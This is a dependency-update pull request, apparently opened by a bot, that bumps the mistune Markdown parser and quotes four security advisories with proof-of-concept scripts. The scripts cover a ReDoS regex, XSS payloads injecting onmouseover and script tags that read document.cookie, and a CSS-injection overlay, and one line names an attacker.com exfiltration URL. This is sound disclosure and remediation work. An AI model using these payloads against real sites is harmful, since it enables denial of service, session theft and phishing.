chore(deps): update dependency mistune to v3.2.1 [security] by renovate[bot] · Pull Request #642 · cognitedata/pygen

renovate · 2026-05-08T07:03:32Z

This PR contains the following updates:

Package	Change	Age	Confidence
mistune	`==3.2.0` → `==3.2.1`

Mistune has a ReDoS in LINK_TITLE_RE that allows denial of service via crafted Markdown input

CVE-2026-33079 / GHSA-8mp2-v27r-99xp

More information

Details

Summary

A ReDoS (Regular Expression Denial of Service) vulnerability in LINK_TITLE_RE allows an attacker who can supply Markdown for parsing to cause denial of service. A crafted 58-byte Markdown document blocks the parser for approximately 6 seconds (measured on Apple M2, Python 3.14.3), with exponential growth per additional byte pair.

Details

The vulnerable regex is defined in src/mistune/helpers.py#L20-L25:

LINK_TITLE_RE = re.compile(
    r"[ \t\n]+("
    r'"(?:\\' + PUNCTUATION + r'|[^"\x00])*"|'  # "title"
    r"'(?:\\" + PUNCTUATION + r"|[^'\x00])*'"   # 'title'
    r")"
)

The double-quote branch compiles to "(?:\\[PUNCTUATION]|[^"\x00])*". The two alternatives inside (A|B)* overlap: a backslash followed by a punctuation character (e.g. \!) can be matched by either branch — as a 2-character escaped-punctuation sequence \\!, or as two individual [^"\x00] characters (\ then !). The same ambiguity exists in the single-quoted title branch.

When the input contains repeated \! pairs with no closing ", the regex engine exhaustively backtracks through all 2^N combinations, resulting in exponential O(2^N) time complexity.

This is reachable through normal Markdown parsing via two code paths:

Inline links: [text](url "PAYLOAD) → parse_link() → parse_link_title()
Block link reference definitions: [label]: url "PAYLOAD → BlockParser.parse_ref_link() → parse_link_title() at block_parser.py#L259

PoC

import mistune
import time

md = mistune.create_markdown()

##### Test with increasing N (number of \! pairs)
for n in [15, 18, 20, 22, 25]:
    payload = '[x](y "' + '\\!' * n + ')'
    start = time.time()
    md(payload)
    elapsed = time.time() - start
    print(f"N={n:2d}  len={len(payload):3d} bytes  time={elapsed:.3f}s")

Output (Apple M2, Python 3.14.3, mistune 3.2.0):

N=15  len= 38 bytes  time=0.007s
N=18  len= 44 bytes  time=0.044s
N=20  len= 48 bytes  time=0.178s
N=22  len= 52 bytes  time=0.740s
N=25  len= 58 bytes  time=5.922s

Each increment of N roughly doubles the execution time (consistent with O(2^N)).

The same attack works via block link reference definitions:

payload = '[l]: u "' + '\\!' * 25  # 58 bytes, ~6 seconds
md(payload)

Impact

This is a denial of service vulnerability. Any application or service that parses user-supplied Markdown using mistune can be made unresponsive by an attacker submitting a small crafted input (under 100 bytes).

Affected use cases include:

Web applications with Markdown-enabled input fields (comments, posts, descriptions)
Documentation systems that accept user contributions
API endpoints that process Markdown
Jupyter tooling such as nbconvert that relies on mistune for rendering

Suggested Fix

Exclude the backslash character from the catch-all character class to eliminate the alternation overlap:

##### Before (vulnerable):
r'"(?:\\' + PUNCTUATION + r'|[^"\x00])*"'
r"'(?:\\" + PUNCTUATION + r"|[^'\x00])*'"

##### After (fixed):
r'"(?:\\' + PUNCTUATION + r'|[^"\\\x00])*"'
r"'(?:\\" + PUNCTUATION + r"|[^'\\\x00])*'"

This ensures a backslash can only be consumed by the escaped-punctuation branch, eliminating the ambiguity in both the double-quote and single-quote branches. Verified on mistune 3.2.0 (Apple M2, Python 3.14.3):

Reduces N=25 from 4.2 seconds to 0.000006 seconds (700,000x improvement)
Handles N=50 in 0.000008 seconds
Passes all existing functional tests (quoted titles, escaped quotes, escaped punctuation)

Severity

CVSS Score: 8.7 / 10 (High)
Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Mistune Heading ID Attribute has Injection XSS

CVE-2026-44897 / GHSA-v87v-83h2-53w7

More information

Details

Summary

HTMLRenderer.heading() builds the opening <hN> tag by string-concatenating the id attribute value directly into the HTML — with no call to escape(), safe_entity(), or any other sanitisation function. A double-quote character " in the id value terminates the attribute, allowing an attacker to inject arbitrary additional attributes (event handlers, src=, href=, etc.) into the heading element.

The default TOC hook assigns safe auto-incremented IDs (toc_1, toc_2, …) that never contain user text. However, the add_toc_hook() API accepts a caller-supplied heading_id callback. Deriving heading IDs from the heading text itself — to produce human-readable slug anchors like #installation or #getting-started — is by far the most common real-world usage of this callback (every major documentation generator does this). When the callback returns raw heading text, an attacker who controls heading content can break out of the id= attribute.

Details

File: src/mistune/renderers/html.py

def heading(self, text: str, level: int, **attrs: Any) -> str:
    tag = "h" + str(level)
    html = "<" + tag
    _id = attrs.get("id")
    if _id:
        html += ' id="' + _id + '"'    # ← _id is never escaped
    return html + ">" + text + "</" + tag + ">\n"

The text body (line content) is escaped upstream by the inline token renderer, which is why text arrives as " etc. But _id arrives as a raw string directly from whatever the heading_id callback returned — no escaping occurs at any point in the pipeline.

PoC

Step 1 — Establish the baseline (safe default IDs)

The script creates a parser with escape=True and the default add_toc_hook() (no custom heading_id callback). The default hook generates sequential numeric IDs:

md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)          # default: heading_id produces toc_1, toc_2, …

bl_src = "## Introduction\n"
bl_out, _ = md_safe.parse(bl_src)

Output — ID is auto-generated, no user text appears in it:

<h2 id="toc_1">Introduction</h2>

Step 2 — Add the realistic trigger: a text-based heading_id callback

Deriving an anchor ID from the heading text is the standard real-world pattern (slugifiers, mkdocs, sphinx, jekyll all do this). The PoC uses the simplest possible version — return the raw heading text unchanged — to show the vulnerability without any extra transformation:

def raw_id(token, index):
    return token.get("text", "")   # returns raw heading text as the ID

md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)

Step 3 — Craft the exploit payload

Construct a heading whose text contains a double-quote followed by an injected attribute:


##### foo" onmouseover="alert(document.cookie)" x="

When raw_id is called, token["text"] is foo" onmouseover="alert(document.cookie)" x=". This is passed verbatim to heading() as the id attribute value.

Step 4 — Observe attribute breakout in the output

ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n'
ex_out, _ = md_vuln.parse(ex_src)

Actual output:

<h2 id="foo" onmouseover="alert(document.cookie)" x="">foo&quot; onmouseover=&quot;alert(document.cookie)&quot; x=&quot;</h2>

Note: the heading body text is correctly escaped ("), but the id= attribute is not. A user who moves their mouse over the heading triggers alert(document.cookie). Any JavaScript payload can be substituted.

Script

A verification script was created to verify this issue. It creates a HTML page showing the bypass rendering in the browser.

#!/usr/bin/env python3
"""H2: HTMLRenderer.heading() inserts the id= value verbatim — no escaping."""
import os, html as h
from mistune import create_markdown
from mistune.toc import add_toc_hook

def raw_id(token, index):
    return token.get("text", "")

##### --- baseline ---
md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)

bl_file = "baseline_h2.md"
bl_src  = "## Introduction\n"
with open(os.path.join(os.getcwd(), bl_file), "w") as f:
    f.write(bl_src)
bl_out, _ = md_safe.parse(bl_src)

print(f"[{bl_file}]\n{bl_src}")
print("[output — id=toc_1, no user content, safe]")
print(bl_out)

##### --- exploit ---
md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)

ex_file = "exploit_h2.md"
ex_src  = '## foo" onmouseover="alert(document.cookie)" x="\n'
with open(os.path.join(os.getcwd(), ex_file), "w") as f:
    f.write(ex_src)
ex_out, _ = md_vuln.parse(ex_src)

print(f"[{ex_file}]\n{ex_src}")
print("[output — heading_id returns raw text, id= not escaped]")
print(ex_out)

##### --- HTML report ---
CSS = """
body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#&#8203;111;padding:0 24px}
h1{font-size:1.3em;border-bottom:3px solid #&#8203;333;padding-bottom:8px;margin-bottom:4px}
p.desc{color:#&#8203;555;font-size:.9em;margin-top:6px}
.case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)}
.case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em}
.baseline .case-header{background:#d1fae5;color:#&#8203;065f46}
.exploit  .case-header{background:#fee2e2;color:#&#8203;7f1d1d}
.panels{display:grid;grid-template-columns:1fr 1fr;background:#fff}
.panel{padding:16px}
.panel+.panel{border-left:1px solid #eee}
.panel h3{margin:0 0 8px;font-size:.68em;color:#&#8203;888;text-transform:uppercase;letter-spacing:.07em}
pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all}
.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace}
.rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em}
"""

def case(kind, label, filename, src, out):
    return f"""
<div class="case {kind}">
  <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div>
  <div class="panels">
    <div class="panel">
      <h3>Input — {h.escape(filename)}</h3>
      <pre>{h.escape(src)}</pre>
    </div>
    <div class="panel">
      <h3>Output — HTML source</h3>
      <pre>{h.escape(out)}</pre>
      <div class="rlabel">↓ rendered in browser (hover the heading to trigger onmouseover)</div>
      <div class="rendered">{out}</div>
    </div>
  </div>
</div>"""

page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8">
<title>H2 — Heading ID XSS</title><style>{CSS}</style></head><body>
<h1>H2 — Heading ID XSS (unescaped id= attribute)</h1>
<p class="desc">HTMLRenderer.heading() in renderers/html.py does html += ' id="' + _id + '"' with no escaping.
Triggered when heading_id callback returns raw heading text — the most common doc-generator pattern.</p>
{case("baseline", "Clean heading → sequential id=toc_1, safe", bl_file, bl_src, bl_out)}
{case("exploit",  "Malicious heading → quotes break out of id=, onmouseover injected", ex_file, ex_src, ex_out)}
</body></html>"""

out_path = os.path.join(os.getcwd(), "report_h2.html")
with open(out_path, "w") as f:
    f.write(page)
print(f"\n[report] {out_path}")

Example Usage:

python poc.py

Once the script is run, open report_h2.html in the browser and observe the behaviour.

Impact

Dimension	Assessment
Confidentiality	Session cookie / auth token theft via JavaScript execution triggered on mouse interaction
Integrity	DOM manipulation, phishing content injection, forced navigation
Availability	Page freeze or crash available to attacker

Risk context: This vulnerability targets the most common customisation point for heading IDs. Any documentation site, wiki, or blog engine that generates slug-style anchors from heading text is vulnerable if it uses mistune's heading_id callback without independently sanitising the returned value.

Severity

CVSS Score: 6.1 / 10 (Medium)
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Mistune TOC Anchor Injection XSS

CVE-2026-44898 / GHSA-6269-cqxg-mhhv

More information

Details

Summary

render_toc_ul() builds a <ul> table-of-contents tree from a list of (level, id, text) tuples. Both the id value (used as href="#<id>") and the text value (used as the visible link label) are inserted into <a> tags via a plain Python format string — with no HTML escaping applied to either value.

When heading IDs are derived from user-supplied heading text (the standard use-case for readable slug anchors), an attacker can craft a heading whose text breaks out of the href="#..." attribute context, injecting arbitrary HTML tags including <script> blocks directly into the rendered TOC.

This vulnerability is closely related to H2 (unescaped id= in heading()): the same heading_id callback pattern that triggers H2 also populates the toc_items list that render_toc_ul() consumes, meaning both vulnerabilities fire simultaneously in a typical documentation setup.

Details

File: src/mistune/toc.py

def render_toc_ul(toc):
    ...
    for level, k, text in toc:
        # k   = heading id  (used verbatim as href fragment)
        # text = heading text (used verbatim as link label)
        item = '<a href="#{}">{}</a>'.format(k, text)
        # Neither k nor text is passed through escape() at any point

The k and text values come directly from the toc_items list accumulated during parsing. If k contains " or >, the href attribute is broken. If text contains <, raw tags are injected as the visible link content.

PoC

Step 1 — Establish the baseline (safe default IDs)

The script creates a parser with escape=True and the default add_toc_hook() (no custom callback). The default hook assigns sequential numeric IDs that never contain user text:

md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)

bl_src = "# Introduction\n\n## Installation\n"
_, state = md_safe.parse(bl_src)
bl_out = render_toc_ul(state.env.get("toc_items", []))

Output — clean, safe TOC:

<ul>
<li><a href="#toc_1">Introduction</a>
<ul>
<li><a href="#toc_2">Installation</a></li>
</ul>
</li>
</ul>

Step 2 — Enable the vulnerable heading_id callback

Register a callback that returns the raw heading text as the ID. This is the standard slug-based anchor pattern used by documentation generators:

def raw_id(token, index):
    return token.get("text", "")

md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)

Step 3 — Craft the exploit payload

Construct a heading whose text terminates the href="#..." attribute and injects a <script> block followed by a dangling <a href=" to absorb the closing "> that render_toc_ul appends:


##### x"><script>alert(document.cookie)</script><a href="

When raw_id processes this heading, it returns the entire text as the ID: x"><script>alert(document.cookie)</script><a href=".

Step 4 — Observe script injection in the TOC output

ex_src = '## x"><script>alert(document.cookie)</script><a href="\n'
_, state = md_vuln.parse(ex_src)
ex_out = render_toc_ul(state.env.get("toc_items", []))

render_toc_ul() formats the malicious ID directly into the <a href>:

'<a href="#{}">{}</a>'.format(k, text)

##### becomes:
'<a href="#x"><script>alert(document.cookie)</script><a href="">...<a/>'

Actual output:

<ul>
<li><a href="#x"><script>alert(document.cookie)</script><a href="">x&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;a href=&quot;</a></li>
</ul>

The <script> block is live in the document. Note that the anchor label (text) is escaped correctly by mistune's inline renderer before it reaches toc_items, but k (the heading ID) is not escaped anywhere.

Script

I have built a script that you can use to verify this. It creates a HTML page showing the bypass so that you can see it render in the browser.

#!/usr/bin/env python3
"""H4: render_toc_ul() puts raw heading ID into <a href> without escaping."""
import os, html as h
from mistune import create_markdown
from mistune.toc import add_toc_hook, render_toc_ul

def raw_id(token, index):
    return token.get("text", "")

##### --- baseline ---
md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)

bl_file = "baseline_h4.md"
bl_src  = "# Introduction\n\n## Installation\n"
with open(os.path.join(os.getcwd(), bl_file), "w") as f:
    f.write(bl_src)
_, state = md_safe.parse(bl_src)
bl_out = render_toc_ul(state.env.get("toc_items", []))

print(f"[{bl_file}]\n{bl_src}")
print("[toc output — safe]")
print(bl_out)

##### --- exploit ---
md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)

ex_file = "exploit_h4.md"
ex_src  = '## x"><script>alert(document.cookie)</script><a href="\n'
with open(os.path.join(os.getcwd(), ex_file), "w") as f:
    f.write(ex_src)
_, state = md_vuln.parse(ex_src)
ex_out = render_toc_ul(state.env.get("toc_items", []))

print(f"[{ex_file}]\n{ex_src}")
print("[toc output — script injected via href breakout]")
print(ex_out)

##### --- HTML report ---
CSS = """
body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#&#8203;111;padding:0 24px}
h1{font-size:1.3em;border-bottom:3px solid #&#8203;333;padding-bottom:8px;margin-bottom:4px}
p.desc{color:#&#8203;555;font-size:.9em;margin-top:6px}
.case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)}
.case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em}
.baseline .case-header{background:#d1fae5;color:#&#8203;065f46}
.exploit  .case-header{background:#fee2e2;color:#&#8203;7f1d1d}
.panels{display:grid;grid-template-columns:1fr 1fr;background:#fff}
.panel{padding:16px}
.panel+.panel{border-left:1px solid #eee}
.panel h3{margin:0 0 8px;font-size:.68em;color:#&#8203;888;text-transform:uppercase;letter-spacing:.07em}
pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all}
.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace}
.rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em}
"""

def case(kind, label, filename, src, out):
    return f"""
<div class="case {kind}">
  <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div>
  <div class="panels">
    <div class="panel">
      <h3>Input — {h.escape(filename)}</h3>
      <pre>{h.escape(src)}</pre>
    </div>
    <div class="panel">
      <h3>TOC output — HTML source</h3>
      <pre>{h.escape(out)}</pre>
      <div class="rlabel">↓ rendered in browser</div>
      <div class="rendered">{out}</div>
    </div>
  </div>
</div>"""

page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8">
<title>H4 — TOC XSS</title><style>{CSS}</style></head><body>
<h1>H4 — TOC render_toc_ul() XSS</h1>
<p class="desc">render_toc_ul() in toc.py uses '&lt;a href="#{{}}"&gt;{{}}&lt;/a&gt;'.format(k, text) —
neither k (the heading ID) nor text is escaped before insertion.</p>
{case("baseline", "Normal headings → sequential IDs → clean TOC links", bl_file, bl_src, bl_out)}
{case("exploit",  "Malicious heading ID breaks out of href='#...' → script injected", ex_file, ex_src, ex_out)}
</body></html>"""

out_path = os.path.join(os.getcwd(), "report_h4.html")
with open(out_path, "w") as f:
    f.write(page)
print(f"\n[report] {out_path}")

Example usage:

python poc.py

Once you run the script, open report_h4.html in the browser and observe the behaviour.

Impact

Dimension	Assessment
Confidentiality	JavaScript execution; attacker can exfiltrate session cookies and any data accessible from the page's origin
Integrity	Arbitrary DOM manipulation, phishing form injection, forced redirects
Availability	Page crash or freeze available as secondary effect

Risk context: TOC generation is a rendering step that often happens in a different template layer from the main body render, potentially reviewed separately and trusted implicitly. Vulnerabilities in TOC output are frequently overlooked in code review. Combined with H2, an attacker exploiting this via a single malicious heading simultaneously injects into both the heading element and the TOC anchor.

Severity

CVSS Score: 6.1 / 10 (Medium)
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Mistune Image Directive CSS Injection Vulnerability

CVE-2026-44899 / GHSA-ccfx-mfmx-2fx9

More information

Details

Summary

The Image directive plugin validates the :width: and :height: options with a regex compiled as _num_re = re.compile(r"^\d+(?:\.\d*)?"). This pattern is applied via re.match() (which anchors only at the start of the string, not the end). Any value that begins with one or more digits passes validation, regardless of what follows.

When the validated value is not a plain integer, render_block_image() inserts it directly into a style="width:...;" or style="height:...;" attribute. Because the value was accepted by the prefix-only regex, any CSS after the leading digits reaches the style= attribute verbatim and without escaping.

An attacker can therefore inject an arbitrary chain of CSS properties — including position:fixed, background-color, z-index, outline, and opacity — using nothing more than a single :width: option in a fenced image directive. The resulting element can visually cover the entire browser viewport, enabling full-page phishing overlays and UI redressing attacks.

Details

File: src/mistune/directives/image.py

_num_re = re.compile(r"^\d+(?:\.\d*)?")   # no $ anchor — prefix match only

def _parse_attrs(options):
    height = options.get("height")
    width  = options.get("width")
    if height and _num_re.match(height):   # passes if value STARTS with a digit
        attrs["height"] = height           # full value stored, not just digits
    if width and _num_re.match(width):     # same — prefix-only check
        attrs["width"] = width

And in render_block_image():

if width:
    if width.isdigit():
        img += ' width="' + width + '"'   # safe: integer → HTML attribute
    else:
        style += "width:" + width + ";"   # UNSAFE: non-integer → raw style value

The isdigit() branch correctly uses an HTML attribute for plain integers. The else branch assumes that anything that passed _num_re.match() is a safe CSS length like 100px or 50%. However, because the regex is prefix-only, 100vw;height:100vh;position:fixed;... also passes, and the entire string lands in style= unmodified.

PoC

Step 1 — Establish the baseline (safe plain-integer dimensions)

The script creates a parser with escape=True, FencedDirective, and the Image plugin. A safe image directive is rendered with integer width and height:

md = create_markdown(escape=True, plugins=[FencedDirective([Image()])])

bl_src = (
    "```{image} photo.jpg\n"
    ":width: 400\n"
    ":height: 300\n"
    ":alt: safe image\n"
    "```\n"
)
bl_out = str(md(bl_src))

Expected and actual output — clean width= and height= HTML attributes, no style=:

<div class="block-image"><img src="photo.jpg" alt="safe image" width="400" height="300" /></div>

Step 2 — Understand why non-integer widths go into style=

When width is not a plain integer (e.g., 100px), width.isdigit() returns False, so the render path falls through to style += "width:" + width + ";". This is the intended mechanism for CSS-unit dimensions. The flaw is that _num_re.match() lets far more than CSS units through.

Step 3 — Craft the exploit payload

Provide a :width: value that begins with a valid number (satisfying _num_re.match()) but appends an entire CSS attack chain after it:

:width: 100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93

100vw — starts with 1, passes _num_re.match(); also sets the width to full viewport width
;height:100vh — overrides height to full viewport height
;position:fixed — lifts element out of document flow, fixed to the browser viewport
;top:0;left:0 — anchors overlay to the top-left corner
;z-index:9999 — places it above all other page content
;background-color:#e11d48 — fills the overlay with vivid crimson
;outline:8px solid #facc15 — adds a bright yellow border
;color:#fff;opacity:.93 — styles the alt-text label in white with near-full opacity

Full exploit markdown:

```{image} x.jpg
:width: 100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93
:alt: ⚠ CSS INJECTED — click to dismiss ⚠


**Step 4 — Observe the injected `style=` in the output**

```python
ex_src = (
    "```{image} x.jpg\n"
    ":width: 100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;"
    "background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93\n"
    ":alt: ⚠ CSS INJECTED — click to dismiss ⚠\n"
    "```\n"
)
ex_out = str(md(ex_src))

Actual output:

<div class="block-image"><img src="x.jpg" alt="⚠ CSS INJECTED — click to dismiss ⚠" style="width:100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93;" /></div>

Every injected CSS property is present in the style= attribute. When a browser renders this HTML, the <img> element:

expands to fill 100% of the viewport width and height
sits fixed at the top-left corner, scrolling with the viewport
is coloured crimson with a yellow outline
appears above all other page content

The result is a complete full-page phishing overlay generated from a single Markdown image directive.

Script

I have built a script that you can use to verify this. It creates a HTML page showing the bypass so that you can see it render in the browser.

#!/usr/bin/env python3
"""H6: Image directive CSS injection — width/height use prefix-only re.match().

Exploit combines: position:fixed  +  background-color  +  outline colour
→ a full-viewport coloured overlay injected via a single :width: option.
"""
import os, html as h
from mistune import create_markdown
from mistune.directives import FencedDirective
from mistune.directives.image import Image

md = create_markdown(escape=True, plugins=[FencedDirective([Image()])])

##### --- baseline ---
bl_file = "baseline_h6.md"
bl_src  = (
    "```{image} photo.jpg\n"
    ":width: 400\n"
    ":height: 300\n"
    ":alt: safe image\n"
    "```\n"
)
with open(os.path.join(os.getcwd(), bl_file), "w") as f:
    f.write(bl_src)
bl_out = str(md(bl_src))

print(f"[{bl_file}]\n{bl_src}")
print("[output — clean width/height attributes, no style injection]")
print(bl_out)

##### --- exploit ---

##### _num_re.match() is prefix-only (no $ anchor), so anything after the leading
##### digits is accepted and written verbatim into style="width:<value>;".

##### This single :width: value smuggles a full CSS attack chain:
#####   position:fixed  → overlay sits above the entire page

#####   top/left/width/height → covers 100 % of the viewport
#####   background-color:#e11d48 → vivid crimson fill

#####   outline:8px solid #facc15 → bright yellow border
#####   color:#fff → white alt-text label

#####   z-index:9999 → on top of everything
ex_file = "exploit_h6.md"
ex_src  = (
    "```{image} x.jpg\n"
    ":width: 100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;"
    "background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93\n"
    ":alt: ⚠ CSS INJECTED — click to dismiss ⚠\n"
    "```\n"
)
with open(os.path.join(os.getcwd(), ex_file), "w") as f:
    f.write(ex_src)
ex_out = str(md(ex_src))

print(f"[{ex_file}]\n{ex_src}")
print("[output — colour + background-colour + fixed overlay injected into style=]")
print(ex_out)

##### --- HTML report ---
CSS = """
body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#&#8203;111;padding:0 24px}
h1{font-size:1.3em;border-bottom:3px solid #&#8203;333;padding-bottom:8px;margin-bottom:4px}
p.desc{color:#&#8203;555;font-size:.9em;margin-top:6px}
.warn{background:#fffbeb;border:1px solid #fbbf24;border-radius:6px;padding:10px 16px;
      font-size:.85em;color:#&#8203;92400e;margin:12px 0}
.case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;
      box-shadow:0 1px 4px rgba(0,0,0,.1)}
.case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em}
.baseline .case-header{background:#d1fae5;color:#&#8203;065f46}
.exploit  .case-header{background:#fee2e2;color:#&#8203;7f1d1d}
.panels{display:grid;grid-template-columns:1fr 1fr;background:#fff}
.panel{padding:16px}
.panel+.panel{border-left:1px solid #eee}
.panel h3{margin:0 0 8px;font-size:.68em;color:#&#8203;888;text-transform:uppercase;letter-spacing:.07em}
pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;
    font-size:.78em;white-space:pre-wrap;word-break:break-all}
.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace}
.rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;
          background:#fff;font-size:.9em;position:relative;overflow:hidden;height:180px}
/* scope the live-render sandbox so position:fixed stays inside the box */
.sandbox{position:relative;width:100%;height:100%}
.sandbox img{max-width:100%;max-height:100%;object-fit:contain}
/* override position:fixed on exploit img to keep it inside the preview box */
.sandbox img[style*="position:fixed"]{position:absolute!important;width:100%!important;
  height:100%!important;top:0!important;left:0!important}
"""

def case(kind, label, filename, src, out):
    header = "BASELINE" if kind == "baseline" else "EXPLOIT"
    sandbox = f'<div class="sandbox">{out}</div>'
    return f"""
<div class="case {kind}">
  <div class="case-header">{header} — {h.escape(label)}</div>
  <div class="panels">
    <div class="panel">
      <h3>Input — {h.escape(filename)}</h3>
      <pre>{h.escape(src)}</pre>
    </div>
    <div class="panel">
      <h3>Output — HTML source</h3>
      <pre>{h.escape(out)}</pre>
      <div class="rlabel">↓ live render (sandboxed to preview box)</div>
      <div class="rendered">{sandbox}</div>
    </div>
  </div>
</div>"""

page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8">
<title>H6 — Image CSS Injection</title><style>{CSS}</style></head><body>
<h1>H6 — Image Directive CSS Injection</h1>
<p class="desc">
  <code>_parse_attrs()</code> in <code>directives/image.py</code> validates
  <code>:width:</code> / <code>:height:</code> with <code>_num_re.match()</code>
  (prefix-only — no <code>$</code> anchor). Anything after the leading digits
  is accepted verbatim and written straight into a <code>style=</code> attribute.
  A single <code>:width:</code> option is sufficient to smuggle an arbitrary
  CSS chain: <strong>position:fixed · background-color · outline colour · full-viewport overlay</strong>.
</p>
<div class="warn">
  ⚠ The EXPLOIT preview below is sandboxed inside its box.
  In a real document the crimson overlay would cover the <em>entire browser window</em>.
</div>
{case("baseline",
      "Integer dims → clean width/height= attributes, no style=",
      bl_file, bl_src, bl_out)}
{case("exploit",
      ":width: carries position:fixed + background-color + outline → full-viewport coloured overlay",
      ex_file, ex_src, ex_out)}
</body></html>"""

out_path = os.path.join(os.getcwd(), "report_h6.html")
with open(out_path, "w") as f:
    f.write(page)
print(f"\n[report] {out_path}")

Example usage:

python poc.py

Once you run the script, open report_h6.html in the browser and observe the behaviour.

Impact

Dimension	Assessment
Confidentiality	CSS-based data exfiltration via `background-image: url(https://attacker.com/?leak=...)` is possible in some browser/CSP configurations
Integrity	Full-viewport overlay enables complete UI replacement: phishing login forms, fake alerts, click-jacking, brand impersonation
Availability	The overlay obscures all page content from the user until dismissed or navigated away

Real-world impact scenario: An attacker posts a Markdown document to a platform (wiki, issue tracker, documentation site) that renders mistune with the Image directive. Any user who views the page sees a full-screen crimson overlay matching the attacker's design, replacing or concealing the legitimate page content. The overlay can contain a convincing login prompt, survey form, or urgent warning designed to capture credentials.

Severity

CVSS Score: 4.7 / 10 (Medium)
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Release Notes

lepture/mistune (mistune)

`v3.2.1`

Compare Source

🐞 Bug Fixes

Resolve Windows compatibility issues in file inclusion and tests - by @Yuki9814 (25471)
Escape html text - by @lepture (a3cb6)
Update link reference - by @lepture (85eb5)
Handle escaped dollar signs in inline math - by @saschabuehrle in #370 (7bd57)
Escape id of toc - by @lepture (04880)
Escape id of headings - by @lepture (28556)
Remove double-encoding of image alt text - by @lawrence3699 (0d6f3)
Escape xml for math plugin - by @lepture (5fa09)
Use strict regex for image's height and width - by @lepture (8d0cb)

View changes on GitHub

Configuration

📅 Schedule: (UTC)

Branch creation
- ""
Automerge
- At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

github-actions · 2026-05-08T07:06:30Z

☂️ Python Coverage

current status: ✅

Overall Coverage

Lines	Covered	Coverage	Threshold	Status
4965	3560	72%	60%	🟢

New Files

No new covered files...

Modified Files

No covered modified files...

updated for commit: 1f4972c by action🐍

renovate Bot requested review from a team as code owners May 8, 2026 07:03

renovate Bot temporarily deployed to dev May 8, 2026 07:03 Inactive

renovate Bot changed the title ~~chore(deps): update dependency mistune to v3.2.1 [security]~~ chore(deps): update dependency mistune to v3.2.1 [security] - autoclosed May 27, 2026

renovate Bot closed this May 27, 2026

renovate Bot deleted the renovate/pypi-mistune-vulnerability branch May 27, 2026 18:08

chore(deps): update dependency mistune to v3.2.1 [security]

1f4972c

renovate Bot changed the title ~~chore(deps): update dependency mistune to v3.2.1 [security] - autoclosed~~ chore(deps): update dependency mistune to v3.2.1 [security] May 28, 2026

renovate Bot reopened this May 28, 2026

renovate Bot force-pushed the renovate/pypi-mistune-vulnerability branch 2 times, most recently from 34c5933 to 1f4972c Compare May 28, 2026 21:17

renovate Bot deployed to dev May 28, 2026 21:17 Active

Provide feedback

